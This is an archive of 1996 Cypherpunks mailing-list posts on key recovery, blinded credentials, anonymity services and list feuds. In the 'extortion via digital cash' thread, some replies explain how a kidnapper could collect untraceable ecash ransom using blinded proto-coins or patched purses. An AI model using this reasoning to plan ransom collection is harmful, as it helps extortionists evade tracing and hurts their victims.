On Tue, 15 Oct 1996, Dr.Dimitri Vulis KOTM wrote:

> I've been receiving multiples copies of threats of frivolous
> lawsuits in connection with Sandy Sanford's kind offer...

Dimitri has not told the truth--at least according to the 
"threat" he included, infra.

The "threat" has to do with his postings to this list, not with
his visit to California.  (Dimitri's failure to tell the truth is 
probably not a lie but arises from his limited skills with the
English language.)


> ]Attached is a tiny example of the type of uncalled-for slander that Mr.
> ]Dimitri Vulis has been sending unsolicited to a list of subscribers to a
   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^  
> ]cryptography forum.
> ]
> ]You are hereby notified of this illegal activity by one of your subscribers.
> ]If you fail to take corrective measures, the Boardwalk Brighton Beach
> ]BBS and its sysops may be named in a civil lawsuit.

Nothing there about visiting California that I can see.  


 S a n d y

P.S.1	For what it's worth, most Bay Area Cypherpunks 
	are straight.  Some are gay, that's life.  WE
	DON'T CARE.  Privacy is our concern.  

P.S.2	It seems that the only folks who have a real
	fixation on homosexuality are latent homosexuals.  
	Gays and straights who are confident in their own 
	sexuality don't get that worked up about it.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wa6ube@ix.netcom.com
Date: Tue, 15 Oct 1996 08:07:33 -0700 (PDT)
To: jya@pipeline.com
Subject: Re: FLY_not
Message-ID: <19961015845036334@ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


John Young writes:
>
>On 10/14/96 09:30:38 you wrote:
>
>   10-13-96. CoWo:
>
>   "Encryption confusion"
>
>      Reminded of the secret Clipper algorithm, I sought
>      details from IBM. I asked a spokeswoman why the company
>      hadn't just put out a nice, snappy white paper
>      explaining its new approach to key recovery. "We spent
>      three months trying to do that, quite literally," the
>      spokeswoman said. "It's pretty confusing stuff, and
>      whenever we get it on paper, we aren't happy with it."
>
>   10-12-96. InWe:
>
>   "IBM Coalition May Not Fly" [Thanks, WR]
>
>      "The relaxation on encryption is in many ways an
>      extortion of industry," said Bob Gargus, president of
>      the Atalla. "If this starts to happen for export, how
>      many companies will be able to support two standards? I
>      think every American should be worried." But Greg Simon,
>      domestic policy adviser to Vice President Al Gore, said,
>      "We're not looking for an answer that's universally
>      popular. We're looking for a solution that's balanced
>      and fair."
>
----remainder snipped-----

-----BEGIN PGP SIGNED MESSAGE-----

I am curious, if there is this "coalition" of companies that have
joined IBM on this new Key Recovery Plan, Has anyone yet found out
who the other members of this coalition 
-----BEGIN PGP SIGNATURE-----
Version: 4.0 Personal Edition

iQCVAwUBMmOndMDUh3vt7LRPAQEsnQP8Cs9yUdETZjTdZPar236cavjWRspQI/vU
9W7DKgUu0QeknOVmmmfbhQSRx8o6W/NcelVG67hXzIE8Zui5LPBefOpOIr6qHOqc
ySzLUXS7l0lq5a7Radc/+WoXM/WoHZXYHX6eU7HsJ7dosn7vZiMG2p75+06BBKA6
MCO5n68h2BU=
=jy/0
-----END PGP SIGNATURE-----

Patricia Gibbons <wa6ube@ix.netcom.com>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Tue, 15 Oct 1996 09:10:11 -0700 (PDT)
To: Paul Pomes <ppomes@qualcomm.com>
Subject: Re: PLEDGES
In-Reply-To: <199610151454.HAA19108@zelkova.qualcomm.com>
Message-ID: <Pine.SUN.3.91.961015085426.2814D-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Paul,

You wrote:

> What the hell, I'll spring for $200.  It would be the needed
> excuse to leave San Diego anyway.

Wah whoo!  This, plus some other new pledges puts us over the
$1000 mark.  Now all we need is some show of intestinal fortitude
from Dimitri.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bruce M." <bkmarsh@feist.com>
Date: Tue, 15 Oct 1996 07:18:26 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: SPA sues C2, other ISPs and users
In-Reply-To: <2.2.32.19961015002121.00a3476c@mail.c2.net>
Message-ID: <Pine.BSI.3.91.961015091806.21730A-100000@wichita.fn.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 14 Oct 1996, Douglas Barnes wrote:

> 2) As obnoxious as the lawsuit is, we don't miss the humor in
>    the fact that we've been grumbling (on-line and off) about 
>    folks who pirate Stronghold (our commercial, secure version
>    of the Apache web server). We really were looking into 
>    joining the SPA, to see if it would do us any good in dealing 
>    with this problem.

    Hopefully you've realized that the potential membership dues could 
probably be better invested in good copyright protection schemes..

                       ________________________________
                      [ Bruce M. - Feist Systems, Inc. ]
                       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
      "We don't want to get our butts kicked by a bunch of long-haired 
        26-year-olds with earrings." -- General John Sheehan on their 
                       reasons for InfoWar involvement





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Tue, 15 Oct 1996 09:14:35 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Blinded Identities [was Re: exporting signatures only/CAPI]
In-Reply-To: <199610140530.WAA17735@crypt>
Message-ID: <v03007801ae8974825701@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:25 PM -0500 10/14/96, William H. Geiger III wrote:

(responding to Hal Finney's comments about blinded credentials, including
identity credentials)

>Hmmmm... I am at a loss as why the customers identity needs to be know at all?
>
>What does it matter if I am a new customer or not?

This is an important issue, which has an important answer. The answer will
sound flippant, but is worth thinking about.

Namely, maybe it _doesn't_ matter if one is a new customer, maybe it
_does_. More particularly, it is up to the customer and vendor to negotiate
a mutually agreeable arrangement. Sometimes this includes identities,
sometimes proofs of religious belief, sometimes proofs of credit worthiness
(solvency, expectation of repayment, etc.).

Neither Chaum nor Finney nor myself have ever (that I recall) called for a
government-mandated system of _identities_. The whole point of "blinded
credentials" is so that "selective disclosure of information" can occur.

The canonical example is an "age credential" for entry into bars, for
example, or for rental of adult videos, as another example. (The present
system--simply _looking_ at a person to confirm that they "look old
enough"--works pretty well for most adults, with only those in the margin
zone being "carded." Even with "carding," a bar owner only checks the age
field, and the photo field of course, to verify age. Chaum's concerns when
he wrote his "systems to foil Big Brother" papers in the mid-80s were that
fully-computerized versions of these credentials would present substantial
threats to privacy. Rather than just looking at an age credential, and then
forgetting the data seen, computers and surveillance systems would
_remember_ all presentations of credentials, allowing extensive
construction of dossiers on movements, purchases, habits, etc.).

Anyway, getting back to Wm. Geiger's question, "What does it matter if I am
a new customer or not?," maybe it does matter, maybe it doesn't. As a
merchant, I might offer "new customers" special prices or services that I
don't normally offer. Whatever. The important point is not to have
government (for example) interefere in such transactions. Customers are
free to offer such credentials as they wish to, and merchants are free to
refuse the credentials offered.

(In the real world, there are few businesses that want extensive
credentials. The most important credential to them is _cash_, which is an
interesting form of "blinded credential" (if you think about it). Namely,
cash is "proof of ability to pay without any other credentials." Paying by
check (a promise that one's bank will make good) or by asking for a
purchase to be put on a "tab" (for later payment), are both situations
where a merchant might demand various forms of credentials.)


>I don't see why we couldn't have anonymous prepaid credit-cards similiar
>to the prepaid calling cards available now. You pop down to the local bank
>here's $500 cash, they give you your card, when you have used up your $500
>you throw it away. Of cource the issuer of the card would charge some fee
>for the service, say $1 on every $100, maybe more maybe less the market
>will decide that. :)

But in this example, William has just described a form of blinded
credential! Exactly Hal's point.

>No one need know who I am or what I am purchasing. Much simpler to
>implement, no id verification, no blinded credentials, Just treat it like
>any other credit card.
>
>KISS - Keep It Simple Stupid :)

Sometimes things are simple, sometimes simple things are stupid. The key of
our kind of cryptography is to allow mutually acceptable, mutually
negotiated protocols. Sometimes these will be just "blinded proofs of
ability to pay" (cash, prepaid cards, etc.), sometimes these may involve
other forms of proof. (For example, imagine a sex club that demands a
blinded proof that one is HIV-negative.)

The key point is that such protocols be voluntary.

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bruce M." <bkmarsh@feist.com>
Date: Tue, 15 Oct 1996 07:25:41 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Killing Mr. Wallace of "Savetrees"?
In-Reply-To: <v03007800ae88ce3644c9@[207.167.93.63]>
Message-ID: <Pine.BSI.3.91.961015092349.21730B-100000@wichita.fn.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 14 Oct 1996, Timothy C. May wrote:

> At 7:06 PM -0800 10/14/96, jim bell wrote:
> >At 04:26 PM 10/14/96 -0400, Ray Arachelian wrote:
> >>On Sun, 13 Oct 1996, Roy M. Silvernail wrote:
> >
> >>
> >>I'd like to join you on this.  I have sent email to
> >>wallace@asswipespamnet already as well as left them voice mail for every
> >>message they sent, they will be charged $500 per message and the next one
> >>I receive constitutes acceptance.  I've since then recieved about 4-5
> >>more, which means they owe me $2000 or thereabouts. :)
> >>
> >>So what steps do we need in putting some teeth into this?
> >
> >"You rang, Sir?"
> 
> Careful, Jim, you are coming _very_ close to crossing the line. You appear
> to be volunteering to have Mr. Wallace (and perhaps his family?) killed.

    I see nothing in any of these messages about the murder or even 
slightest physical attack against Mr. Wallace.  Instead "putting some 
teeth into this" looks like it implies taking further actions 
on collecting a debt.  I suppose one extreme way of interpreting that 
would be to kill the debtor.

                       ________________________________
                      [ Bruce M. - Feist Systems, Inc. ]
                       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
      "We don't want to get our butts kicked by a bunch of long-haired 
        26-year-olds with earrings." -- General John Sheehan on their 
                       reasons for InfoWar involvement





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Tue, 15 Oct 1996 10:58:54 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: extortion via digital cash
In-Reply-To: <96Oct15.114214edt.15378-2@gateway.aca.ca>
Message-ID: <v03007802ae898f66a879@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:44 AM -0400 10/15/96, scottb@aca.ca wrote:
>Hi, I have been reading numerous threads on digital cash, and I have some
>questions I would like discussed.

Just for your own education, this issue was discussed extensively in the
early days of the list, and over on the Extropians list. I myself have
written extensively about this, and the Cyphernomicon has sections on this.

Hal Finney, Robin Hanson, David Friedman, Nick Szabo, and several others
were active in these discussions. And the extortion/contract killings
market issues are well-known to folks like David Chaum. (That people are
aware of, and discussing, issues does not, of course, imply that they
endorse or advocate anything. In fact, several of these named people are
quite concerned with the implications.)

Searches of archives, depending on what is available at any given moment,
may turn up articles. Try to read these articles and raise specific points.
It is unreasonable to expect any of us to write brand-new essays on
well-trod ground.


>I am hoping that this will spark some discussion, and maybe slow down the
>dlv, TM spam war.

The best way to spark discussion is to compose essays, in my opinion.

For the record, you should note that I am not taking part in the "spam war"
you refer to. I don't respond to Vulis, and his stuff (including any good
analyses, unfortunately, go into my trash folder...sometimes I glance at
them to keep current on what he's ranting about, sometimes I just empty the
trash without even seeing what's landed in it.

(I've also received a couple of notes from people suggesting basically that
I should "stop participating and "just make nice"" with Vulis. Such
cluelessness about what is actually being said, and the use of
Kindergarten-level phrases like "just make nice," shows that some people
have no sense of reality and have no concept of who is to blame and who is
not to blame. "Why can't the Jews and the Arabs just make nice?")

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Tue, 15 Oct 1996 11:14:20 -0700 (PDT)
To: scottb@aca.ca
Subject: Re: extortion via digital cash
Message-ID: <v02130503ae891eae8ee1@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>Hi, I have been reading numerous threads on digital cash, and I have some
>questions I would like discussed.
>
>currently when someone does extortion (kiddnapping too), they have two
>choices;
>
>1-pick up the cash personally (or via a stooge)
>2-transfer the funds via bank
>
>Both ideas are bad, in that you stand a good chance at getting caught.
>
>I was wondering, what if you demanded payment via Ecash, through nym
>servers, aliases, etc.  From what I understand, it is just like cash, ie: no
>record of transaction, but you get the added bonus of not having to meet the
>other party-like a fund transfer.  Once you have your 1,000,000 Ecash, you
>could dump it on a disk, and close your internet account (unless you really
>really trust your privacy technology).  And I also think that you would have
>the option to cash this into real funds at either the Mark Twain bank, or
>likely somewhere in the Caymen Islands (maybe through those online gambling
>houses).
>
>I am hoping that this will spark some discussion, and maybe slow down the
>dlv, TM spam war.
>
>Also, I was only wondering about this for mere discussion reasons :)
>
>/sb

Although Digicash's ecash offers anonymity to the payor it does not to the
payee.  The reasons have to do with the way coins are blinded.  So LE
could, with the bank's cooperation, easily associate the two sides of a
transaction.  This was intentional on Chaum's part, either for moral or
practical political considerations.  Its probably only a relatively minor
patch to allow one ecash purse (the kidnapper's) to generate the blind
token values so that another (similarly patched) purse (the vicitim's) can
submit them to the mint and return the minted coins to the kidnapper (e.g.,
by posting on a popular Usenet group).  In this scenario the only
reasonable way left to track the money is via linkage (the size and timing
of deposits and withdrawls in the kidnapper's account).



PGP Fingerprint: FE 90 1A 95 9D EA 8D 61  81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Snoop Daty Data           | Internet: azur@netcom.com
Grinder                   |
Sacred Cow Meat Co.       |
---------------------------------------------------------------------

Counter-cultural technology development our specialty.

Vote Libertarian.

Just say NO to prescription DRUGS.

"Of all tyrannies, a tyranny sincerely exercised for
 the good of its victims may be the most oppressive."
    -- C.S. Lewis

"Surveillence is ultimately just another form of media, and thus, potential
entertainment."
    -- G. Beato






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Tue, 15 Oct 1996 11:52:52 -0700 (PDT)
To: "'Sandy Sandfort'" <sandfort@crl.com>
Subject: RE: PLEDGES
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-961015184423Z-53136@mail2.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


From:	Sandy Sandfort 

Wah whoo!  This, plus some other new pledges puts us over the
$1000 mark.  Now all we need is some show of intestinal fortitude
from Dimitri.
........................................................


Well, hey -  if Dimitri is feeling kinda weak & puny, I'll take his
place.   Youall can pay my airfare & hotel charge, and I'll think of
something to talk about with you guys.

How about: Imaginative, Non-Crypto-Related Ways to Avoid the Government.
 (Uni? I'd be delighted to discuss this in person).   

$1000 makes for a fine party!

   ..
Blanc






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: scottb@aca.ca
Date: Tue, 15 Oct 1996 08:41:27 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: extortion via digital cash
Message-ID: <96Oct15.114214edt.15378-2@gateway.aca.ca>
MIME-Version: 1.0
Content-Type: text/plain



Hi, I have been reading numerous threads on digital cash, and I have some
questions I would like discussed.

currently when someone does extortion (kiddnapping too), they have two 
choices;

1-pick up the cash personally (or via a stooge)
2-transfer the funds via bank

Both ideas are bad, in that you stand a good chance at getting caught.

I was wondering, what if you demanded payment via Ecash, through nym 
servers, aliases, etc.  From what I understand, it is just like cash, ie: no 
record of transaction, but you get the added bonus of not having to meet the 
other party-like a fund transfer.  Once you have your 1,000,000 Ecash, you 
could dump it on a disk, and close your internet account (unless you really 
really trust your privacy technology).  And I also think that you would have 
the option to cash this into real funds at either the Mark Twain bank, or 
likely somewhere in the Caymen Islands (maybe through those online gambling 
houses).

I am hoping that this will spark some discussion, and maybe slow down the 
dlv, TM spam war.

Also, I was only wondering about this for mere discussion reasons :)

/sb




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mike Babcock" <mbabcock@tyenet.com>
Date: Tue, 15 Oct 1996 08:55:10 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Key Exchange Request
Message-ID: <199610151552.LAA19685@spirit.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Type Bits/KeyID    Date       User ID
pub  1280/FA4C5DB1 1996/06/13 Michael T. Babcock <mbabcock@tyenet.com>
                              Michael T. Babcock <mbabcock@cyberbeach.net>

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i
Comment: http://www.cyberbeach.net/~mbabcock/PGP/

mQCtAzHAhC8AAAEFAMG+C+yN8q7KDT5TUSdyQNZlDDlTGuF4vUzPEq52lrqx7NAA
YwJuj0dtOnnU2GAAonNutYF7nbbsS5yjWWgENioKOzIdjgDpq+YBZDkX4kFTD/+5
PM5EZhS1kT54zDpbjlZHtu9ViL3xUD/vp5zmp7Mlxqdd5SbkM0bpIBlBIqfpij59
hOVgc837YtAMmAbuRzwzy06/5ne221MLA/pMXbEABRG0KE1pY2hhZWwgVC4gQmFi
Y29jayA8bWJhYmNvY2tAdHllbmV0LmNvbT6JAJUDBRAx2dcPTeL4zy9PtLMBAZ0+
A/9T8thIB2MW/0X0H4HTPNQ5TJlXM/56wxEtWNrr0Veku+lJvMdm6JvCDHqIfNC8
lTsWCg1Hot7EyNWhtXPp29A2fgLK/8hVJiFDs55ClWk9E4x3ug2mLZESid3qJO6U
3AnnzbI1ZuAelcX6tzJAYtJlbUz3t2y0pUloDUz7Uj4oGIkAlQMFEDHAhI2lZOCu
UMiZpQEBcr0EAJP1lU3gJCidTwyHNlc16kybaTfECQz/TV7W+OqOcdH3mD3HKxUk
J5KHRqTL4mS/tiiTmFEuFnwJaa36f+8ARkjq2EgmUX74ItfpcdplU3Sxe04om7Oy
7XNrgqWWpt+dEqQQqOLEVCTfuwNQck96GLLu1hZUXfrgDkpBT0rsl6cMiQC1AwUQ
McCEMNtTCwP6TF2xAQGj3AT/VMMu5yZZTychDeLMfxsMse/xQ1/Ioi2UzApBdyiQ
7EVXWWHG0q5GGwGMiIsPeIFcbvF39DwSBX2BsBcnQh90wERdRsCo2BkG7Sw9Pk5a
13FDiXv+5eUDRsc0Z7z874vvpurzV1afuL+LKCAgOlxJhinikKqbR89AVLx4xRzl
/BAyE4OBUfZZNIpshmtJdhSO/027WEAd6jXEHu3IkIl4+LQsTWljaGFlbCBULiBC
YWJjb2NrIDxtYmFiY29ja0BjeWJlcmJlYWNoLm5ldD6JAJUDBRAxwIpqpWTgrlDI
maUBAXnqA/0X+RTykzFUl0IMVVfJeb1JPMTBlq4vMwAdsipYTtHPMNfWNfp7hsUO
Sk4/v1IzX0pEysHvQhD/Q56s0MYDd+gxMV17v0JnBI36wTgIEjOITMKUKShlHyWx
RGCs0KmCt8NJ958IwRErbCw9EIdObX9JChzXTvGA91kpXYxOwpr6XokAtQMFEDHA
ij/bUwsD+kxdsQEBtc4E+wUYFsgqjThhUxpBFBdRc0k1oXKzbVl+itKUtdfqOH1d
Wc99PMkdttqVi3ME0xLNOfVLYg0lROyZqR8xZKLfKCGLoFWUE8kOFoL+VuZQ/Nuz
VS0bArNMk8+ghbSiC82IFScQkFcvISkuDgMOyaDviNPbeb2QMhjkhP20NDLaX5tW
UNSXfjUMJLCp33yNaM9/fwGAs6V21qeViJh9IFxUh04=
=OAVt
- -----END PGP PUBLIC KEY BLOCK-----


	This message was sent by Pronto Secure Mail.
	Above is my public key.
	Please send your public key by return mail.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMmOzQyoZzwIn1bdtAQFCUQF9E1ggA7yYJ/mwRD98YF5ZFh+5yUz5YJy4
qCA7f+rprv4llxArrYTlZU/fAOwHmQ64
=OFUM
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 15 Oct 1996 08:58:13 -0700 (PDT)
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Re: "Right to Privacy" and Crypto
Message-ID: <3.0b19.32.19961015115525.0067560c@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


>I'm of course just a layman, not a law professor or scholar. But I feel it
>best that we not invoke a "right to privacy" to protect our crypto
>abilities, when such a "right" apparently does not exist.
>
>However, certain things which _look_ like a "right to privacy" do exist:

I agree with your analysis.  It certainly matches what I was taught in law
school.  The rhetorical point I was making however is that a *practical*
not constitutional right to privacy exists as long as your questioner
eschews torture.  I think it is useful to point out -- in response to
government types who assert that "there's no absolute right to privacy" --
that they have actually set aside a zone of privacy by their rejection of
torture as an interrogation technique.

What this does is to remind listeners that coerced speech has an unsavory
history and it turns the argument from one between absolute positions into
one in which we are just arguing which sanctions should be applied when.

DCF

"Note that many governments have officially given up rape and torture as
sanctions.  (These were once universal.)  All we have to do is get them to
give up murder, imprisonment, and robbery as sanctions and we'll have
civilized them completely."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Tue, 15 Oct 1996 10:30:23 -0700 (PDT)
To: azur@netcom.com
Subject: Re: exporting signatures only/CAPI (was Re: Why not PGP?)
In-Reply-To: <v02130503ae865897f409@[10.0.2.15]>
Message-ID: <199610151118.MAA00175@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Steve Schear <azur@netcom.com> writes:
> On a related note:
> 
> I've been charged with developing an Internet service which needs to assure
> its clients of anonymity.  However, we fear some clients may abuse the
> service and we wish to prevent the abusers from re-enrollment if
> terminated for misbehavior. (In your example, it would be the person(s)
> trying to discover the service host via flood).

Chaum's DC net solves flood problems.  However it itself has high
bandwidth requirements.  Also you need to do something about denial of
service attacks.  There are algorithms to detect disrupters.

> >Of course Ross Anderson's `eternity service' provides the general case
> >solution for distribution of such data.  It is complex to implement
> >well though.
> 
> I've never heard of the eternity service.  Where can I get more information?

Ross Andersion's www page is:

	http://www.cl.cam.ac.uk/~rja14/

he has a collection of postscript files for published and to be
published papers, eternity service is one of them.

You might find Matt Blaze's netescrow interesting also, and related:

	ftp://ftp.research.att.com/dist/mab/netescrow.ps

> BTW, would Eric Hughes' Universal Piracy System also solve such a
> situation, by distributing or parking snippets of encrypted file
> data across many 'cooperating' ftp (or whatever access/storage
> mechanism) sites.

Sounds similar to eternity.  It involves splitting the data over many
sites in many jurisdictions.  Is a UPS description available on www?

> Perhaps the negative authentication approach would help here too by
> preventing flood/denial of service attacks against the 'key' sites.
> If only snippets of encrypted data are stored on any one host it
> might make the SPA's goal even more elusive legally.

Eternities approach is to place sites in different jurisdictions, and
to arrange so that the sites themselves don't know what data the parts
of which they are serving.  (Removes the knowledge of what is being
distributed, which seems to be an element of the legal concept of
contributory infringement, as explained by Greg Broiles).

Adam
--
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Tue, 15 Oct 1996 10:10:41 -0700 (PDT)
To: wa6ube@ix.netcom.com
Subject: Re: FLY_not
In-Reply-To: <19961015845036334@ix.netcom.com>
Message-ID: <199610151816.NAA29525@homeport.org>
MIME-Version: 1.0
Content-Type: text


wa6ube@ix.netcom.com wrote:

| I am curious, if there is this "coalition" of companies that have
| joined IBM on this new Key Recovery Plan, Has anyone yet found out
| who the other members of this coalition

	A bunch are listed, including RSA.  What I want to know is,
are any privacy right organizations on the comittee?  How about
consultants organizations?  I know that as a private security
consultant, I'd like to be able to join so that I can be aware of
developments, help the group clarify their aims, and provide my
customers with the best advice I can give them.

	I feel that a good white paper is very important, so we all
know where we're going, and what the road is paved with.

Adam

-- 
"Every year the Republicans campaign like Libertarians, and then go to
Wasthington and spend like Democrats."

Vote Harry Browne for President.  http://www.harrybrowne96.org







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 15 Oct 1996 13:37:38 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Service pays users (sort of) to read commercial e-mail
Message-ID: <199610152036.NAA10315@dfw-ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:50 PM 10/14/96 -0700, Greg Broiles <gbroiles@netbox.com> wrote:
>>From time to time we've discussed the economics of paying per-message costs
>for E-mail, and/or systems where advertisers pay users to read their
>messages. Someone seems to have set up a system like that. It's at
><http://www.aristotle.org>. They seem to be using voter registration as an
>is-a-real-person credential. (Their idea seems to be that they'll charge

Aristotle.org is run by John Aristotle Phillips.  If you remember
back in the 70s when a student at Princeton designed an atomic bomb
as his junior physics project, that was him (he wasn't brilliant;
he just needed a really good paper to bring up his low physics grades.)
He's since gone into political consulting.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk
  Imagine if three million people voted for somebody they _knew_,
  and the politicians had to count them all.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Tue, 15 Oct 1996 21:06:18 -0700 (PDT)
To: scottb@aca.ca
Subject: Re: extortion via digital cash
In-Reply-To: <96Oct15.114214edt.15378-2@gateway.aca.ca>
Message-ID: <9610151846.AA00586@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


scottb@aca.ca writes:
>  I was wondering, what if you demanded payment via Ecash,
>  through nym servers, aliases, etc.  From what I understand,
>  it is just like cash, ie: no record of transaction, but you
>  get the added bonus of not having to meet the other party-like
>  a fund transfer.

This has been discussed quite a bit on the list before and there is even a  
bit about it in Applied Cryptography.  Basically the extortionist must be  
careful in how he arranges payment.  The extortionist must create blinded  
proto-coins and send them to the extortionee to be signed.  Otherwise the  
extortionee can write down the serial numbers before sending the coins off and  
the extortionist will get caught when trying to deposit.

Some of the cut-n-choose protocols for after-the-fact catching of double  
spenders would prevent this from happening.  Because the proto-coins from the  
extortionist are blinded and the extortionee can't remove the blinding, it  
would be impossible for the extortionee to properly complete the protocol with  
the bank and pay-off the extortionist.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 15 Oct 1996 14:01:23 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: WOW!
In-Reply-To: <199610151613.RAA03956@digicash.com>
Message-ID: <NyquVD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


bryce@digicash.com writes:
> > > I already responded more times than this threat warranted
> > 
> > I'm totally nonplused.  Does anyone on the list have any idea 
> > what Dimitri is talking about?  Has he posted a RESPONSIVE answer
> > to my invitation?  If so, I never saw it.  
> 
> 
> He responded two or three times, but I wasn't able to determine
> whether he was saying "Yea" or "Nay".  Perhaps he didn't believe
> that your offer was serious.
> 
> 
> > Does anyone have any idea why Dimitri uses the term "threat"?  I 
> > have not threatened Dimitri and I have indicated that as my guest 
> > he will be under the mantle of my protection.  He'll be safer here 
> > than he is in his own bed.
> 
> 
> I believe he typo'ed "thread".
> 
Yes - I mistyped "thread". My apologies.

Once again: I already replied to this _thread_, and then I received a
_threat_ of a libel lawsuit in connection with this _threat_. Sorry
for the typoes and the resulting confusion.

At any rate, if people are really willing to pay this sort of money
to hear me speak, perhaps I should make a videotape of me giving a
presentation about my Usenet cancelbot and send it to Sandy?

Thanks to Bryce for the correction.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gimonca@skypoint.com (Charles Gimon)
Date: Tue, 15 Oct 1996 12:48:54 -0700 (PDT)
To: cypherpunks@toad.com
Subject: extortion via digital cash (fwd)
Message-ID: <m0vDFTo-0002mgC@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded message:
> From: scottb@aca.ca
> Date: Tue, 15 Oct 1996 11:44:25 -0400
> Subject:  extortion via digital cash
> 
> Both ideas are bad, in that you stand a good chance at getting caught.
> 
> I was wondering, what if you demanded payment via Ecash, through nym 
> servers, aliases, etc.  From what I understand, it is just like cash, ie: no 
> record of transaction, but you get the added bonus of not having to meet the 
> other party-like a fund transfer.  Once you have your 1,000,000 Ecash, you 
